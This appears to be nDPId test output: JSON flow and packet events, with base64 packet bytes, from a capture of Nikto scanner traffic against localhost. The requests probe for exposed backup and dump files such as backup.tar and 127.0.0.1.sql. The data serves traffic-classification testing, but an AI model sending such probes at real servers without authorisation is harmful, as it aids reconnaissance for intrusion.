(Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277269,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":1,"flow_last_seen":1576420277269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277269,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/XglAAEAG3i1\/AAABfwAAAcR2H5D4uGaj1sX5qYAYAED+swAAAQEICp1m\/T2dZv09R0VUIC8xMjcuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277269,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277270,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":1,"flow_last_seen":1576420277270,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277270,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/A5hAAEAGOJ9\/AAABfwAAAcR4H5CBQjs0aZw5xIAYAED+swAAAQEICp1m\/T6dZv0+R0VUIC8xMjcuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277270,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277272,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":1,"flow_last_seen":1576420277272,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277272,"pkt":"AAAAAAAAAAAAAAAACABFAADA729AAEAGTMZ\/AAABfwAAAcR6H5Cm4tfMZrHSAYAYAED+tAAAAQEICp1m\/UCdZv1AR0VUIC8xLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277272,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277274,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":1,"flow_last_seen":1576420277274,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277274,"pkt":"AAAAAAAAAAAAAAAACABFAADAlOZAAEAGp09\/AAABfwAAAcR8H5CKg6xDWKPSxIAYAED+tAAAAQEICp1m\/UKdZv1CR0VUIC8xLnRhci5neiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277274,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277276,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":1,"flow_last_seen":1576420277276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277276,"pkt":"AAAAAAAAAAAAAAAACABFAAC9in1AAEAGsbt\/AAABfwAAAcR+H5AyA7LdjyrNp4AYAED+sQAAAQEICp1m\/USdZv1DR0VUIC8wLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277276,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277277,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":1,"flow_last_seen":1576420277277,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277277,"pkt":"AAAAAAAAAAAAAAAACABFAAC906lAAEAGaI9\/AAABfwAAAcSAH5AxZOsBFr\/0GYAYAED+sQAAAQEICp1m\/UWdZv1FR0VUIC8wLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277277,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277278,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":1,"flow_last_seen":1576420277278,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277278,"pkt":"AAAAAAAAAAAAAAAACABFAADCR05AAEAG9OV\/AAABfwAAAcSCH5Cv93\/sjlpOBIAYAED+tgAAAQEICp1m\/UadZv1GR0VUIC9iYWNrdXAudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277278,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277279,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":1,"flow_last_seen":1576420277279,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277279,"pkt":"AAAAAAAAAAAAAAAACABFAADCyNdAAEAGc1x\/AAABfwAAAcSEH5CsG\/B+ct073oAYAED+tgAAAQEICp1m\/UedZv1HR0VUIC9iYWNrdXAudGFyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277279,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277281,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":1,"flow_last_seen":1576420277281,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277281,"pkt":"AAAAAAAAAAAAAAAACABFAADFYHdAAEAG27l\/AAABfwAAAcSGH5C8uFjeIpIdX4AYAED+uQAAAQEICp1m\/UidZv1IR0VUIC8xMjcuMC4wLjEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277281,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277282,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_packet_id":1,"flow_last_seen":1576420277282,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277282,"pkt":"AAAAAAAAAAAAAAAACABFAADFoI1AAEAGm6N\/AAABfwAAAcSIH5D0M5gk0yESEIAYAED+uQAAAQEICp1m\/UqdZv1KR0VUIC8xMjcuMC4wLjEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":384,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277282,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277283,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":1,"flow_last_seen":1576420277283,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277283,"pkt":"AAAAAAAAAAAAAAAACABFAADDBOlAAEAGN0p\/AAABfwAAAcSKH5Dv6jxQN18efIAYAED+twAAAQEICp1m\/UudZv1LR0VUIC8xMjcuMC4wLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277283,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
